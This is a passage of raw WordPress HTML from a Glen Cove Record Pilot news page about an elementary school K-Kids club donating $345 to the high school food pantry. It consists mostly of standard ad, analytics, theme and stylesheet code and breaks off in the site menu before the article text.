<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]-->
<head>
<script type='text/javascript'>
  (function() {
    var useSSL = 'https:' == document.location.protocol;
    var src = (useSSL ? 'https:' : 'http:') +
        '//www.googletagservices.com/tag/js/gpt.js';
    document.write('<scr' + 'ipt src="' + src + '"></scr' + 'ipt>');
  })();
</script>

<script type='text/javascript'>
  googletag.cmd.push(function() {
    googletag.defineSlot('/33457410/1x1GlenCove', [1, 1], 'div-gpt-ad-1463589647854-0').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenC_InnerPage_Leader', [728, 90], 'div-gpt-ad-1463589647854-1').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenCove_ATF_Cube', [300, 250], 'div-gpt-ad-1463589647854-2').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenCove_728x90_pgal', [728, 90], 'div-gpt-ad-1463589647854-3').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenCove_Leader', [728, 90], 'div-gpt-ad-1463589647854-4').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenCove_int_CubeA', [300, 250], 'div-gpt-ad-1463589647854-5').addService(googletag.pubads());
    googletag.defineSlot('/33457410/GlenCove_int_CubeB', [300, 250], 'div-gpt-ad-1463589647854-6').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.pubads().enableSyncRendering();
    googletag.enableServices();
  });
</script>





<!-- /33457410/1x1GlenCove -->
<div id='div-gpt-ad-1463589647854-0' style='height:1px; width:1px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463589647854-0'); });
</script>
</div>
    <title>Connolly K-Kids Donate To HS Food Pantry | Glen Cove Record Pilot</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="https://glencoverecordpilot.com/xmlrpc.php" />
    <link rel="icon" type="image/png" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-16x16.png"><link rel="apple-touch-icon-precomposed" sizes="76x76" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-76x76.png"/><link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-120x120.png"/><link rel="apple-touch-icon-precomposed" sizes="152x152" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-152x152.png"/><link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-114x114.png"/><link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://glencoverecordpilot.com/wp-content/uploads/2016/11/Glen-Cove-144x144.png"/><link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//maps.googleapis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Glen Cove Record Pilot &raquo; Feed" href="https://glencoverecordpilot.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Glen Cove Record Pilot &raquo; Comments Feed" href="https://glencoverecordpilot.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Glen Cove Record Pilot &raquo; Connolly K-Kids Donate To HS Food Pantry Comments Feed" href="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/glencoverecordpilot.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.1"}};
			/*! This file is auto-generated */
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://glencoverecordpilot.com/wp-includes/css/dist/block-library/style.min.css?ver=5.4.1' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mpp_gutenberg-css'  href='https://glencoverecordpilot.com/wp-content/plugins/metronet-profile-picture/dist/blocks.style.build.css?ver=2.3.11' type='text/css' media='all' />
<link rel='stylesheet' id='events-manager-css'  href='https://glencoverecordpilot.com/wp-content/plugins/events-manager/includes/css/events_manager.css?ver=5.973' type='text/css' media='all' />
<link rel='stylesheet' id='fvp-frontend-css'  href='https://glencoverecordpilot.com/wp-content/plugins/featured-video-plus/styles/frontend.css?ver=2.3.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=8.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='https://glencoverecordpilot.com/wp-content/themes/Newspaper/style.css?ver=6.1c' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-child-css'  href='https://glencoverecordpilot.com/wp-content/themes/Newspaper-child/style.css?ver=6.1c' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='https://glencoverecordpilot.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://glencoverecordpilot.com/wp-content/plugins/jetpack/css/jetpack.css?ver=8.3' type='text/css' media='all' />
<script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":1,"isRTL":false});});
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4'></script>
<script type='text/javascript'>
( 'fetch' in window ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js?ver=3.0.0"></scr' + 'ipt>' );( document.contains ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js?ver=3.42.0"></scr' + 'ipt>' );( window.DOMRect ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js?ver=3.42.0"></scr' + 'ipt>' );( window.URL && window.URL.prototype && window.URLSearchParams ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-url.min.js?ver=3.6.4"></scr' + 'ipt>' );( window.FormData && window.FormData.prototype.keys ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js?ver=3.0.12"></scr' + 'ipt>' );( Element.prototype.matches && Element.prototype.closest ) || document.write( '<script src="https://glencoverecordpilot.com/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js?ver=2.0.2"></scr' + 'ipt>' );
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/dist/dom-ready.min.js?ver=91fc8f05178d5c6365aec778f840ae17'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/dist/a11y.min.js?ver=45f739d280d1244f6cb498ed8f1bf042'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var EM = {"ajaxurl":"https:\/\/glencoverecordpilot.com\/wp-admin\/admin-ajax.php","locationajaxurl":"https:\/\/glencoverecordpilot.com\/wp-admin\/admin-ajax.php?action=locations_search","firstDay":"1","locale":"en","dateFormat":"dd\/mm\/yy","ui_css":"https:\/\/glencoverecordpilot.com\/wp-content\/plugins\/events-manager\/includes\/css\/jquery-ui.min.css","show24hours":"","is_ssl":"1","bookingInProgress":"Please wait while the booking is being submitted.","tickets_save":"Save Ticket","bookingajaxurl":"https:\/\/glencoverecordpilot.com\/wp-admin\/admin-ajax.php","bookings_export_save":"Export Bookings","bookings_settings_save":"Save Settings","booking_delete":"Are you sure you want to delete?","booking_offset":"30","bb_full":"Sold Out","bb_book":"Book Now","bb_booking":"Booking...","bb_booked":"Booking Submitted","bb_error":"Booking Error. Try again?","bb_cancel":"Cancel","bb_canceling":"Canceling...","bb_cancelled":"Cancelled","bb_cancel_error":"Cancellation Error. Try again?","txt_search":"Search","txt_searching":"Searching...","txt_loading":"Loading..."};
/* ]]> */
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/events-manager/includes/js/events-manager.js?ver=5.973'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/featured-video-plus/js/jquery.fitvids.min.js?ver=master-2015-08'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var fvpdata = {"ajaxurl":"https:\/\/glencoverecordpilot.com\/wp-admin\/admin-ajax.php","nonce":"628b19e343","fitvids":"1","dynamic":"","overlay":"","opacity":"0.75","color":"b","width":"640"};
/* ]]> */
</script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/featured-video-plus/js/frontend.min.js?ver=2.3.3'></script>
<script type='text/javascript' src='https://glencoverecordpilot.com/wp-content/plugins/post-sharing-network/inc/wireframe/v1.10/js/jquery.wireframe.js?ver=5.4.1'></script>
<link rel='https://api.w.org/' href='https://glencoverecordpilot.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://glencoverecordpilot.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://glencoverecordpilot.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Sea Cliff’s Fiona Shonik is Winner of 2020 Marguerite Suozzi Music Scholarship' href='https://glencoverecordpilot.com/sea-cliffs-fiona-shonik-is-winner-of-2020-marguerite-suozzi-music-scholarship/' />
<link rel='next' title='Obituaries Week of May 13' href='https://glencoverecordpilot.com/obituaries-week-of-may-13/' />
<meta name="generator" content="WordPress 5.4.1" />
<link rel="canonical" href="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/" />
<link rel='shortlink' href='https://wp.me/p7tUZ3-2xZ' />
<link rel="alternate" type="application/json+oembed" href="https://glencoverecordpilot.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://glencoverecordpilot.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fglencoverecordpilot.com%2Fconnolly-k-kids-donate-to-hs-food-pantry%2F&#038;format=xml" />
<!-- SLP Custom CSS -->
<style type="text/css">
div#map.slp_map {
width:100%;
height:480px;
}
div#slp_tagline {
width:100%;
}
</style>


<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<link rel='dns-prefetch' href='//jetpack.wordpress.com'/>
<link rel='dns-prefetch' href='//s0.wp.com'/>
<link rel='dns-prefetch' href='//s1.wp.com'/>
<link rel='dns-prefetch' href='//s2.wp.com'/>
<link rel='dns-prefetch' href='//public-api.wordpress.com'/>
<link rel='dns-prefetch' href='//0.gravatar.com'/>
<link rel='dns-prefetch' href='//1.gravatar.com'/>
<link rel='dns-prefetch' href='//2.gravatar.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style id="tdw-css-placeholder"></style>			<script>
				window.tdwGlobal = {"adminUrl":"https:\/\/glencoverecordpilot.com\/wp-admin\/","wpRestNonce":"1da9d1c062","wpRestUrl":"https:\/\/glencoverecordpilot.com\/wp-json\/","permalinkStructure":"\/%postname%\/"};
			</script>
			<!--[if lt IE 9]><script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://glencoverecordpilot.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="https://glencoverecordpilot.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Connolly K-Kids Donate To HS Food Pantry" />
<meta property="og:url" content="https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/" />
<meta property="og:description" content="&nbsp; The Margaret A. Connolly Elementary School K-Kids recently donated $345 to the Glen Cove High School food pantry. The money was raised during the K-Kids annual Valentine’s day lollipop sale …" />
<meta property="article:published_time" content="2020-05-14T14:42:47+00:00" />
<meta property="article:modified_time" content="2020-05-14T04:45:24+00:00" />
<meta property="og:site_name" content="Glen Cove Record Pilot" />
<meta property="og:image" content="https://glencoverecordpilot.com/wp-content/uploads/2020/05/GC-Connolly-K-Kids-300x300.jpg" />
<meta property="og:image:width" content="300" />
<meta property="og:image:height" content="300" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:creator" content="@RecordPilot" />
<meta name="twitter:site" content="@RecordPilot" />
<meta name="twitter:text:title" content="Connolly K-Kids Donate To HS Food Pantry" />
<meta name="twitter:card" content="summary" />

<!-- End Jetpack Open Graph Tags -->

<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";
var td_ajax_url="https:\/\/glencoverecordpilot.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=8.1";
var td_get_template_directory_uri="https:\/\/glencoverecordpilot.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="snap";
var tds_logo_on_sticky="";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    
.block-title > span,
    .block-title > span > a,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td_block_template_1 .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2:not(.woocommerce-loop-product__title),
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more,
    .td-weather-information:before,
    .td-weather-week:before,
    .td_block_exchange .td-exchange-header:before,
    .td-theme-wrap .td_block_template_3 .td-block-title > *,
    .td-theme-wrap .td_block_template_4 .td-block-title > *,
    .td-theme-wrap .td_block_template_7 .td-block-title > *,
    .td-theme-wrap .td_block_template_9 .td-block-title:after,
    .td-theme-wrap .td_block_template_10 .td-block-title::before,
    .td-theme-wrap .td_block_template_11 .td-block-title::before,
    .td-theme-wrap .td_block_template_11 .td-block-title::after,
    .td-theme-wrap .td_block_template_14 .td-block-title,
    .td-theme-wrap .td_block_template_15 .td-block-title:before,
    .td-theme-wrap .td_block_template_17 .td-block-title:before {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td_block_template_1 .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before,
    .td-theme-wrap .td_block_template_5 .td-block-title > *,
    .td-theme-wrap .td_block_template_17 .td-block-title,
    .td-theme-wrap .td_block_template_17 .td-block-title::before {
        border-color: #222222;
    }

    .td-theme-wrap .td_block_template_4 .td-block-title > *:before,
    .td-theme-wrap .td_block_template_17 .td-block-title::after {
        border-color: #222222 transparent transparent transparent;
    }

    
    .td-footer-wrapper,
    .td-footer-wrapper .td_block_template_7 .td-block-title > *,
    .td-footer-wrapper .td_block_template_17 .td-block-title,
    .td-footer-wrapper .td-block-title-wrap .td-wrapper-pulldown-filter {
        background-color: #1c1c1c;
    }
</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-65941892-7', 'auto');
  ga('send', 'pageview');

</script><script type="application/ld+json">
                        {
                            "@context": "http://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "https://glencoverecordpilot.com/",
                                "name": "Home"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://glencoverecordpilot.com/category/schools-news/",
                                "name": "Schools News"
                            }
                        },{
                            "@type": "ListItem",
                            "position": 3,
                                "item": {
                                "@type": "WebPage",
                                "@id": "https://glencoverecordpilot.com/connolly-k-kids-donate-to-hs-food-pantry/",
                                "name": "Connolly K-Kids Donate To HS Food Pantry"                                
                            }
                        }    ]
                        }
                       </script>			<style type="text/css" id="wp-custom-css">
				/*
You can add your own CSS here.

Click the help icon above to learn more.
*/


.news-ticker .td-pb-span8{width: 76.66666%;}
.news-ticker .td-pb-span4{width: 23.33333%;}

@media (max-width: 767px){
.td-header-sp-top-menu {
    display: block !important; 
}
}
@media (max-width: 767px)
{
	.td-header-top-menu-full {
    display:  block !important;
}
}
.top_menu_space{top: 30px !important;}

.single-image a{background-size:contain !important}

.td_block_single_image a{background-size:contain !important;background-repeat: no-repeat;}

.td-banner-wrap-full.td-logo-wrap-full.td-container-wrap{margin-top: 28px;}

.td-header-top-menu-full.td-container-wrap {position: fixed;
    width: 100%;
    top: 0px;}
.td-header-menu-wrap.td-affix{top: 28px !important;} 

.td-header-menu-wrap.td-affix{top: 28px !important;} 			</style>
		<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body data-rsssl=1 class="post-template-default single single-post postid-9795 single-format-standard connolly-k-kids-donate-to-hs-food-pantry global-block-template-1 wpb-js-composer js-comp-ver-4.11 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/glencoverecordpilot" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/109613629782626116856" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/RecordPilot" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-main-container"><ul id="menu-main" class="td-mobile-main-menu"><li id="menu-item-3350" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first menu-item-3350"><a href="https://glencoverecordpilot.com/">Home</a></li>
<li id="menu-item-28" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-28"><a href="https://glencoverecordpilot.com/category/glen-cove-news/">Glen Cove News<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-7266" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7266"><a href="https://glencoverecordpilot.com/category/glen-cove-news/anniversary/">100th Anniversary Edition</a></li>
</ul>
</li>
<li id="menu-item-3355" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-3355"><a href="https://glencoverecordpilot.com/category/schools-news/">Schools News</a></li>
<li id="menu-item-3353" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3353"><a href="https://glencoverecordpilot.com/category/fire-police/">Fire &#038; Police</a></li>
<li id="menu-item-4680" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4680"><a href="https://glencoverecordpilot.com/category/sports/">Sports</a></li>
<li id="menu-item-7250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-7250"><a href="https://glencoverecordpilot.com/category/opinion/">Opinion<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-7251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7251"><a href="https://glencoverecordpilot.com/category/opinion/columns/">Columns</a></li>
	<li id="menu-item-7252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7252"><a href="https://glencoverecordpilot.com/category/opinion/editorials/">Editorials</a></li>
	<li id="menu-item-7253" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7253"><a href="https://glencoverecordpilot.com/category/opinion/letters-to-the-editor/">Letters to the Editor</a></li>
</ul>
</li>
<li id="menu-item-7254" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7254"><a href="#">More<i class="td-icon-menu-right td-element-after"></i></a>
